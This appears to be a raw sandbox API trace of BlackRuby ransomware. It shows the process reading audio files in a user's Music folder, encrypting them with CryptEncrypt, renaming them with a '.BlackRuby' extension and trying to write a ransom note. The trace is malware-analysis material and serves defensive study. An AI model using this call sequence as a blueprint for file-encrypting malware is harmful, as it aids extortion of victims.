ftLastWriteTime.dwLowDateTime=0x905391a0, ftLastWriteTime.dwHighDateTime=0x1d35191, nFileSizeHigh=0x0, nFileSizeLow=0x8c20)) returned 1 [0059.778] GetLastError () returned 0x5 [0059.778] SetErrorMode (uMode=0x0) returned 0x1 [0059.779] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Music\\27ASj08CcHmGuNd.wav", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Music\\27ASj08CcHmGuNd.wav", lpFilePart=0x0) returned 0x2a [0059.779] GetLastError () returned 0x5 [0059.779] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Music\\27ASj08CcHmGuNd.wav", nBufferLength=0x105, lpBuffer=0x18e828, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Music\\27ASj08CcHmGuNd.wav", lpFilePart=0x0) returned 0x2a [0059.779] GetLastError () returned 0x5 [0059.779] SetErrorMode (uMode=0x1) returned 0x0 [0059.779] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Music\\27ASj08CcHmGuNd.wav" (normalized: "c:\\users\\eebsym5\\music\\27asj08cchmgund.wav"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0059.779] GetLastError () returned 0x0 [0059.779] GetFileType (hFile=0x184) returned 0x1 [0059.779] SetErrorMode (uMode=0x0) returned 0x1 [0059.779] GetFileType (hFile=0x184) returned 0x1 [0059.779] GetFileSize (in: hFile=0x184, lpFileSizeHigh=0x18eddc | out: lpFileSizeHigh=0x18eddc*=0x0) returned 0x8c20 [0059.779] GetLastError () returned 0x0 [0059.779] ReadFile (in: hFile=0x184, lpBuffer=0x1c0c824, nNumberOfBytesToRead=0x8c20, lpNumberOfBytesRead=0x18ed84, lpOverlapped=0x0 | out: lpBuffer=0x1c0c824*, lpNumberOfBytesRead=0x18ed84*=0x8c20, lpOverlapped=0x0) returned 1 [0059.780] GetLastError () returned 0x0 [0059.780] CloseHandle (hObject=0x184) returned 1 [0059.780] GetLastError () returned 0x0 [0059.780] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Music\\27ASj08CcHmGuNd.wav", nBufferLength=0x105, lpBuffer=0x18e938, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Music\\27ASj08CcHmGuNd.wav", lpFilePart=0x0) returned 0x2a [0059.780] GetLastError () returned 0x0 [0059.780] SetErrorMode (uMode=0x1) returned 0x0 [0059.780] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Music\\27ASj08CcHmGuNd.wav" (normalized: "c:\\users\\eebsym5\\music\\27asj08cchmgund.wav"), fInfoLevelId=0x0, lpFileInformation=0x18edec | out: lpFileInformation=0x18edec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x609b66a0, ftCreationTime.dwHighDateTime=0x1d3546a, ftLastAccessTime.dwLowDateTime=0x905391a0, ftLastAccessTime.dwHighDateTime=0x1d35191, ftLastWriteTime.dwLowDateTime=0x905391a0, ftLastWriteTime.dwHighDateTime=0x1d35191, nFileSizeHigh=0x0, nFileSizeLow=0x8c20)) returned 1 [0059.780] GetLastError () returned 0x0 [0059.780] SetErrorMode (uMode=0x0) returned 0x1 [0059.791] CryptImportKey (in: hProv=0x37c680, pbData=0x1c7841c, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18ed28 | out: phKey=0x18ed28*=0x360e20) returned 1 [0059.791] GetLastError () returned 0x0 [0059.791] CryptContextAddRef (hProv=0x37c680, pdwReserved=0x0, dwFlags=0x0) returned 1 [0059.791] GetLastError () returned 0x0 [0059.796] CryptContextAddRef (hProv=0x37c680, pdwReserved=0x0, dwFlags=0x0) returned 1 [0059.796] GetLastError () returned 0x0 [0059.797] CryptDuplicateKey (in: hKey=0x360e20, pdwReserved=0x0, dwFlags=0x0, phKey=0x18ece4 | out: phKey=0x18ece4*=0x360aa0) returned 1 [0059.797] CryptContextAddRef (hProv=0x37c680, pdwReserved=0x0, dwFlags=0x0) returned 1 [0059.797] GetLastError () returned 0x0 [0059.797] CryptSetKeyParam (hKey=0x360aa0, dwParam=0x4, pbData=0x1ca5468*=0x1, dwFlags=0x0) returned 1 [0059.797] GetLastError () returned 0x0 [0059.797] CryptSetKeyParam (hKey=0x360aa0, dwParam=0x1, pbData=0x1ca5434, dwFlags=0x0) returned 1 [0059.797] GetLastError () returned 0x0 [0059.797] CryptEncrypt (in: hKey=0x360aa0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1ca54b0*, pdwDataLen=0x18ed74*=0x8d20, dwBufLen=0x8d20 | out: pbData=0x1ca54b0*, pdwDataLen=0x18ed74*=0x8d20) returned 1 [0059.797] GetLastError () returned 0x0 [0059.797] CryptEncrypt (in: hKey=0x360aa0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1cb6f1c*, pdwDataLen=0x18ed8c*=0x10, dwBufLen=0x10 | out: pbData=0x1cb6f1c*, pdwDataLen=0x18ed8c*=0x10) returned 1 [0059.797] GetLastError () returned 0x0 [0059.797] CryptEncrypt (in: hKey=0x360aa0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1cb6f4c*, pdwDataLen=0x18ed94*=0x0, dwBufLen=0x10 | out: pbData=0x1cb6f4c*, pdwDataLen=0x18ed94*=0x10) returned 1 [0059.797] GetLastError () returned 0x0 [0059.798] CryptDestroyKey (hKey=0x360e20) returned 1 [0059.798] CryptReleaseContext (hProv=0x37c680, dwFlags=0x0) returned 1 [0059.798] CryptReleaseContext (hProv=0x37c680, dwFlags=0x0) returned 1 [0059.798] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Music\\27ASj08CcHmGuNd.wav", nBufferLength=0x105, lpBuffer=0x18e830, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Music\\27ASj08CcHmGuNd.wav", lpFilePart=0x0) returned 0x2a [0059.798] GetLastError () returned 0x0 [0059.798] SetErrorMode (uMode=0x1) returned 0x0 [0059.799] GetFileType (hFile=0x184) returned 0x1 [0059.799] SetErrorMode (uMode=0x0) returned 0x1 [0059.799] GetFileType (hFile=0x184) returned 0x1 [0059.799] WriteFile (in: hFile=0x184, lpBuffer=0x1cc89c8*, nNumberOfBytesToWrite=0x8d30, lpNumberOfBytesWritten=0x18ed90, lpOverlapped=0x0 | out: lpBuffer=0x1cc89c8*, lpNumberOfBytesWritten=0x18ed90*=0x8d30, lpOverlapped=0x0) returned 1 [0059.800] GetLastError () returned 0xb7 [0059.800] CloseHandle (hObject=0x184) returned 1 [0059.800] GetLastError () returned 0xb7 [0059.800] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Music\\27ASj08CcHmGuNd.wav", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Music\\27ASj08CcHmGuNd.wav", lpFilePart=0x0) returned 0x2a [0059.800] GetLastError () returned 0xb7 [0059.800] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Music\\Encrypted_BuUSJcgNL7jdOC6wAulUZ4bwOh7sPKjh9nXMseKn.BlackRuby", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Music\\Encrypted_BuUSJcgNL7jdOC6wAulUZ4bwOh7sPKjh9nXMseKn.BlackRuby", lpFilePart=0x0) returned 0x53 [0059.800] GetLastError () returned 0xb7 [0059.800] SetErrorMode (uMode=0x1) returned 0x0 [0059.800] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Music\\27ASj08CcHmGuNd.wav" (normalized: "c:\\users\\eebsym5\\music\\27asj08cchmgund.wav"), fInfoLevelId=0x0, lpFileInformation=0x18edd4 | out: lpFileInformation=0x18edd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x609b66a0, ftCreationTime.dwHighDateTime=0x1d3546a, ftLastAccessTime.dwLowDateTime=0x905391a0, ftLastAccessTime.dwHighDateTime=0x1d35191, ftLastWriteTime.dwLowDateTime=0x2bd727c0, ftLastWriteTime.dwHighDateTime=0x1d39df7, nFileSizeHigh=0x0, nFileSizeLow=0x8d30)) returned 1 [0059.800] GetLastError () returned 0xb7 [0059.800] SetErrorMode (uMode=0x0) returned 0x1 [0059.800] MoveFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\Music\\27ASj08CcHmGuNd.wav" (normalized: "c:\\users\\eebsym5\\music\\27asj08cchmgund.wav"), lpNewFileName="C:\\Users\\EEBsYm5\\Music\\Encrypted_BuUSJcgNL7jdOC6wAulUZ4bwOh7sPKjh9nXMseKn.BlackRuby" (normalized: "c:\\users\\eebsym5\\music\\encrypted_buusjcgnl7jdoc6wauluz4bwoh7spkjh9nxmsekn.blackruby")) returned 1 [0059.801] GetLastError () returned 0xb7 [0059.802] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Music\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e838, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Music\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x2f [0059.802] GetLastError () returned 0xb7 [0059.802] SetErrorMode (uMode=0x1) returned 0x0 [0059.802] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Music\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\music\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0059.802] GetLastError () returned 0x5 [0059.803] SetErrorMode (uMode=0x0) returned 0x1 [0059.804] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Music\\2FX8yz2ZQhqPU.m4a", nBufferLength=0x105, lpBuffer=0x18e98c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Music\\2FX8yz2ZQhqPU.m4a", lpFilePart=0x0) returned 0x28 [0059.804] GetLastError () returned 0x5 [0059.804] SetErrorMode (uMode=0x1) returned 0x0 [0059.804] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Music\\2FX8yz2ZQhqPU.m4a" (normalized: "c:\\users\\eebsym5\\music\\2fx8yz2zqhqpu.m4a"), fInfoLevelId=0x0, lpFileInformation=0x1cee7b4 | out: lpFileInformation=0x1cee7b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x86dad220, ftCreationTime.dwHighDateTime=0x1d35518, ftLastAccessTime.dwLowDateTime=0x3ba188d0, ftLastAccessTime.dwHighDateTime=0x1d34bcc, ftLastWriteTime.dwLowDateTime=0x3ba188d0, ftLastWriteTime.dwHighDateTime=0x1d34bcc, nFileSizeHigh=0x0, nFileSizeLow=0xc208)) returned 1 [0059.804] GetLastError () returned 0x5 [0059.804] SetErrorMode (uMode=0x0) returned 0x1 [0059.805] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Music\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e838, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Music\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x2f [0059.805] GetLastError () returned 0x5 [0059.805] SetErrorMode (uMode=0x1) returned 0x0 [0059.805] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Music\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\music\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0059.805] GetLastError () returned 0x5 [0059.806] SetErrorMode (uMode=0x0) returned 0x1 [0059.806] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Music\\7-ha.m4a", nBufferLength=0x105, lpBuffer=0x18e98c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Music\\7-ha.m4a", lpFilePart=0x0) returned 0x1f [0059.806] GetLastError () returned 0x5 [0059.806] SetErrorMode (uMode=0x1) returned 0x0 [0059.806] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Music\\7-ha.m4a" (normalized: "c:\\users\\eebsym5\\music\\7-ha.m4a"), fInfoLevelId=0x0, lpFileInformation=0x1d0c3dc | out: lpFileInformation=0x1d0c3dc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7ed493d0, ftCreationTime.dwHighDateTime=0x1d34e2a, ftLastAccessTime.dwLowDateTime=0xa6852b20, ftLastAccessTime.dwHighDateTime=0x1d34dde, ftLastWriteTime.dwLowDateTime=0xa6852b20, ftLastWriteTime.dwHighDateTime=0x1d34dde, nFileSizeHigh=0x0, nFileSizeLow=0xbcce)) returned 1 [0059.806] GetLastError () returned 0x5 [0059.806] SetErrorMode (uMode=0x0) returned 0x1 [0059.807] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Music\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e838, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Music\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x2f [0059.807] GetLastError () returned 0x5 [0059.807] SetErrorMode (uMode=0x1) returned 0x0 [0059.807] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Music\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\music\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0059.807] GetLastError () returned 0x5 [0059.809] SetErrorMode (uMode=0x0) returned 0x1 [0059.809] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Music\\758R8k6AmDg.m4a", nBufferLength=0x105, lpBuffer=0x18e98c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Music\\758R8k6AmDg.m4a", lpFilePart=0x0) returned 0x26 [0059.809] GetLastError () returned 0x5 [0059.809] SetErrorMode (uMode=0x1) returned 0x0 [0059.809] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Music\\758R8k6AmDg.m4a" (normalized: "c:\\users\\eebsym5\\music\\758r8k6amdg.m4a"), fInfoLevelId=0x0, lpFileInformation=0x1d29fd0 | out: lpFileInformation=0x1d29fd0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8831c1e0, ftCreationTime.dwHighDateTime=0x1d34b9c, ftLastAccessTime.dwLowDateTime=0x33cd53c0, ftLastAccessTime.dwHighDateTime=0x1d35444, ftLastWriteTime.dwLowDateTime=0x33cd53c0, ftLastWriteTime.dwHighDateTime=0x1d35444, nFileSizeHigh=0x0, nFileSizeLow=0x56f9)) returned 1 [0059.809] GetLastError () returned 0x5 [0059.809] SetErrorMode (uMode=0x0) returned 0x1 [0059.814] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Music\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e838, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Music\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x2f [0059.814] GetLastError () returned 0x5 [0059.814] SetErrorMode (uMode=0x1) returned 0x0 [0059.814] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Music\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\music\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0059.814] GetLastError () returned 0x5 [0059.815] SetErrorMode (uMode=0x0) returned 0x1 [0059.815] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Music\\7l-UbqOqc.mp3", nBufferLength=0x105, lpBuffer=0x18e98c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Music\\7l-UbqOqc.mp3", lpFilePart=0x0) returned 0x24 [0059.815] GetLastError () returned 0x5 [0059.815] SetErrorMode (uMode=0x1) returned 0x0 [0059.815] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Music\\7l-UbqOqc.mp3" (normalized: "c:\\users\\eebsym5\\music\\7l-ubqoqc.mp3"), fInfoLevelId=0x0, lpFileInformation=0x1b4b5e4 | out: lpFileInformation=0x1b4b5e4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc906af10, ftCreationTime.dwHighDateTime=0x1d352d0, ftLastAccessTime.dwLowDateTime=0x81f5fea0, ftLastAccessTime.dwHighDateTime=0x1d35339, ftLastWriteTime.dwLowDateTime=0x81f5fea0, ftLastWriteTime.dwHighDateTime=0x1d35339, nFileSizeHigh=0x0, nFileSizeLow=0x11e22)) returned 1 [0059.816] GetLastError () returned 0x5 [0059.816] SetErrorMode (uMode=0x0) returned 0x1 [0059.816] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Music\\7l-UbqOqc.mp3", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Music\\7l-UbqOqc.mp3", lpFilePart=0x0) returned 0x24 [0059.816] GetLastError () returned 0x5 [0059.816] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Music\\7l-UbqOqc.mp3", nBufferLength=0x105, lpBuffer=0x18e828, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Music\\7l-UbqOqc.mp3", lpFilePart=0x0) returned 0x24 [0059.816] GetLastError () returned 0x5 [0059.816] SetErrorMode (uMode=0x1) returned 0x0 [0059.816] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Music\\7l-UbqOqc.mp3" (normalized: "c:\\users\\eebsym5\\music\\7l-ubqoqc.mp3"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0059.816] GetLastError () returned 0x0 [0059.816] GetFileType (hFile=0x184) returned 0x1 [0059.816] SetErrorMode (uMode=0x0) returned 0x1 [0059.816] GetFileType (hFile=0x184) returned 0x1 [0059.816] GetFileSize (in: hFile=0x184, lpFileSizeHigh=0x18eddc | out: lpFileSizeHigh=0x18eddc*=0x0) returned 0x11e22 [0059.816] GetLastError () returned 0x0 [0059.816] ReadFile (in: hFile=0x184, lpBuffer=0x1b4d3b4, nNumberOfBytesToRead=0x11e22, lpNumberOfBytesRead=0x18ed84, lpOverlapped=0x0 | out: lpBuffer=0x1b4d3b4*, lpNumberOfBytesRead=0x18ed84*=0x11e22, lpOverlapped=0x0) returned 1 [0059.817] GetLastError () returned 0x0 [0059.817] CloseHandle (hObject=0x184) returned 1 [0059.817] GetLastError () returned 0x0 [0059.817] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Music\\7l-UbqOqc.mp3", nBufferLength=0x105, lpBuffer=0x18e938, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Music\\7l-UbqOqc.mp3", lpFilePart=0x0) returned 0x24 [0059.817] GetLastError () returned 0x0 [0059.817] SetErrorMode (uMode=0x1) returned 0x0 [0059.817] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Music\\7l-UbqOqc.mp3" (normalized: "c:\\users\\eebsym5\\music\\7l-ubqoqc.mp3"), fInfoLevelId=0x0, lpFileInformation=0x18edec | out: lpFileInformation=0x18edec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc906af10, ftCreationTime.dwHighDateTime=0x1d352d0, ftLastAccessTime.dwLowDateTime=0x81f5fea0, ftLastAccessTime.dwHighDateTime=0x1d35339, ftLastWriteTime.dwLowDateTime=0x81f5fea0, ftLastWriteTime.dwHighDateTime=0x1d35339, nFileSizeHigh=0x0, nFileSizeLow=0x11e22)) returned 1 [0059.818] GetLastError () returned 0x0 [0059.818] SetErrorMode (uMode=0x0) returned 0x1 [0059.818] CryptAcquireContextW (in: phProv=0x18ed4c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18ed4c*=0x37c790) returned 1 [0059.818] GetLastError () returned 0x0 [0059.851] CryptImportKey (in: hProv=0x37c790, pbData=0x1bcb398, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18ed28 | out: phKey=0x18ed28*=0x360ce0) returned 1 [0059.851] GetLastError () returned 0x0 [0059.851] CryptContextAddRef (hProv=0x37c790, pdwReserved=0x0, dwFlags=0x0) returned 1 [0059.851] GetLastError () returned 0x0 [0059.856] CryptContextAddRef (hProv=0x37c790, pdwReserved=0x0, dwFlags=0x0) returned 1 [0059.856] GetLastError () returned 0x0 [0059.856] CryptDuplicateKey (in: hKey=0x360ce0, pdwReserved=0x0, dwFlags=0x0, phKey=0x18ece4 | out: phKey=0x18ece4*=0x360f20) returned 1 [0059.856] CryptContextAddRef (hProv=0x37c790, pdwReserved=0x0, dwFlags=0x0) returned 1 [0059.856] GetLastError () returned 0x0 [0059.856] CryptSetKeyParam (hKey=0x360f20, dwParam=0x4, pbData=0x1bf83e4*=0x1, dwFlags=0x0) returned 1 [0059.856] GetLastError () returned 0x0 [0059.856] CryptSetKeyParam (hKey=0x360f20, dwParam=0x1, pbData=0x1bf83b0, dwFlags=0x0) returned 1 [0059.856] GetLastError () returned 0x0 [0059.856] CryptEncrypt (in: hKey=0x360f20, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1bf842c*, pdwDataLen=0x18ed74*=0x11f20, dwBufLen=0x11f20 | out: pbData=0x1bf842c*, pdwDataLen=0x18ed74*=0x11f20) returned 1 [0059.857] GetLastError () returned 0x0 [0059.857] CryptEncrypt (in: hKey=0x360f20, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1c1c298*, pdwDataLen=0x18ed8c*=0x10, dwBufLen=0x10 | out: pbData=0x1c1c298*, pdwDataLen=0x18ed8c*=0x10) returned 1 [0059.857] GetLastError () returned 0x0 [0059.857] CryptEncrypt (in: hKey=0x360f20, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1c1c2c8*, pdwDataLen=0x18ed94*=0x0, dwBufLen=0x10 | out: pbData=0x1c1c2c8*, pdwDataLen=0x18ed94*=0x10) returned 1 [0059.857] GetLastError () returned 0x0 [0059.857] CryptDestroyKey (hKey=0x360ce0) returned 1 [0059.857] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0059.857] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0059.858] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Music\\7l-UbqOqc.mp3", nBufferLength=0x105, lpBuffer=0x18e830, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Music\\7l-UbqOqc.mp3", lpFilePart=0x0) returned 0x24 [0059.858] GetLastError () returned 0x0 [0059.858] SetErrorMode (uMode=0x1) returned 0x0 [0059.858] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Music\\7l-UbqOqc.mp3" (normalized: "c:\\users\\eebsym5\\music\\7l-ubqoqc.mp3"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0059.859] GetLastError () returned 0xb7 [0059.859] GetFileType (hFile=0x184) returned 0x1 [0059.859] SetErrorMode (uMode=0x0) returned 0x1 [0059.859] GetFileType (hFile=0x184) returned 0x1 [0059.861] CloseHandle (hObject=0x184) returned 1 [0059.861] GetLastError () returned 0xb7 [0059.861] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Music\\7l-UbqOqc.mp3" (normalized: "c:\\users\\eebsym5\\music\\7l-ubqoqc.mp3"), fInfoLevelId=0x0, lpFileInformation=0x18edd4 | out: lpFileInformation=0x18edd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc906af10, ftCreationTime.dwHighDateTime=0x1d352d0, ftLastAccessTime.dwLowDateTime=0x81f5fea0, ftLastAccessTime.dwHighDateTime=0x1d35339, ftLastWriteTime.dwLowDateTime=0x2be0ad40, ftLastWriteTime.dwHighDateTime=0x1d39df7, nFileSizeHigh=0x0, nFileSizeLow=0x11f30)) returned 1 [0059.861] GetLastError () returned 0xb7 [0059.861] SetErrorMode (uMode=0x0) returned 0x1 [0059.861] MoveFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\Music\\7l-UbqOqc.mp3" (normalized: "c:\\users\\eebsym5\\music\\7l-ubqoqc.mp3"), lpNewFileName="C:\\Users\\EEBsYm5\\Music\\Encrypted_g4JEWEl5JzdFJPoHh0ZbrpfSyFbaSJqCIrXTEXR7.BlackRuby" (normalized: "c:\\users\\eebsym5\\music\\encrypted_g4jewel5jzdfjpohh0zbrpfsyfbasjqcirxtexr7.blackruby")) returned 1 [0059.861] GetLastError () returned 0xb7 [0059.861] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Music\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\music\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0059.862] GetLastError () returned 0x5 [0059.862] SetErrorMode (uMode=0x0) returned 0x1 [0059.862] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Music\\7qR61dYnkwu1bn5EV.mp3" (normalized: "c:\\users\\eebsym5\\music\\7qr61dynkwu1bn5ev.mp3"), fInfoLevelId=0x0, lpFileInformation=0x1c4b2b4 | out: lpFileInformation=0x1c4b2b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3d28aed0, ftCreationTime.dwHighDateTime=0x1d34aec, ftLastAccessTime.dwLowDateTime=0x4304e760, ftLastAccessTime.dwHighDateTime=0x1d34a6a, ftLastWriteTime.dwLowDateTime=0x4304e760, ftLastWriteTime.dwHighDateTime=0x1d34a6a, nFileSizeHigh=0x0, nFileSizeLow=0x1788c)) returned 1 [0059.862] GetLastError () returned 0x5 [0059.862] SetErrorMode (uMode=0x0) returned 0x1 [0059.862] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Music\\7qR61dYnkwu1bn5EV.mp3" (normalized: "c:\\users\\eebsym5\\music\\7qr61dynkwu1bn5ev.mp3"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0059.863] GetLastError () returned 0x0 [0059.863] GetFileType (hFile=0x184) returned 0x1 [0059.863] GetFileType (hFile=0x184) returned 0x1 [0059.863] GetFileSize (in: hFile=0x184, lpFileSizeHigh=0x18eddc | out: lpFileSizeHigh=0x18eddc*=0x0) returned 0x1788c [0059.863] GetLastError () returned 0x0 [0059.863] ReadFile (in: hFile=0x184, lpBuffer=0x2c888c0, nNumberOfBytesToRead=0x1788c, lpNumberOfBytesRead=0x18ed84, lpOverlapped=0x0 | out: lpBuffer=0x2c888c0*, lpNumberOfBytesRead=0x18ed84*=0x1788c, lpOverlapped=0x0) returned 1 [0059.864] GetLastError () returned 0x0 [0059.864] CloseHandle (hObject=0x184) returned 1 [0059.864] GetLastError () returned 0x0 [0059.865] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Music\\7qR61dYnkwu1bn5EV.mp3" (normalized: "c:\\users\\eebsym5\\music\\7qr61dynkwu1bn5ev.mp3"), fInfoLevelId=0x0, lpFileInformation=0x18edec | out: lpFileInformation=0x18edec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3d28aed0, ftCreationTime.dwHighDateTime=0x1d34aec, ftLastAccessTime.dwLowDateTime=0x4304e760, ftLastAccessTime.dwHighDateTime=0x1d34a6a, ftLastWriteTime.dwLowDateTime=0x4304e760, ftLastWriteTime.dwHighDateTime=0x1d34a6a, nFileSizeHigh=0x0, nFileSizeLow=0x1788c)) returned 1 [0059.865] GetLastError () returned 0x0 [0059.865] SetErrorMode (uMode=0x0) returned 0x1 [0059.875] CryptImportKey (in: hProv=0x37c680, pbData=0x1ca7580, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18ed28 | out: phKey=0x18ed28*=0x3609e0) returned 1 [0059.875] GetLastError () returned 0x0 [0059.875] CryptContextAddRef (hProv=0x37c680, pdwReserved=0x0, dwFlags=0x0) returned 1 [0059.875] GetLastError () returned 0x0 [0059.880] CryptContextAddRef (hProv=0x37c680, pdwReserved=0x0, dwFlags=0x0) returned 1 [0059.880] GetLastError () returned 0x0 [0059.880] CryptDuplicateKey (in: hKey=0x3609e0, pdwReserved=0x0, dwFlags=0x0, phKey=0x18ece4 | out: phKey=0x18ece4*=0x360da0) returned 1 